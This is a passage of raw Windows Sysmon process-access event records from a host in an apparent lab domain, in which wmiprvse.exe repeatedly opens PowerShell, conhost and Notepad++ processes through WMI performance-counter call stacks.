e+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151223Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151222Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151221Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151220Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151219Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151218Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151217Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151216Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1555-60CA-6A01-00000000D101}4856C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151215Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151214Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6801-00000000D101}1724C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151213Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151212Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1553-60CA-6701-00000000D101}1880C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151211Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151210Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5801-00000000D101}1968C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151209Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151208Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-14E3-60CA-5701-00000000D101}416C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151207Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 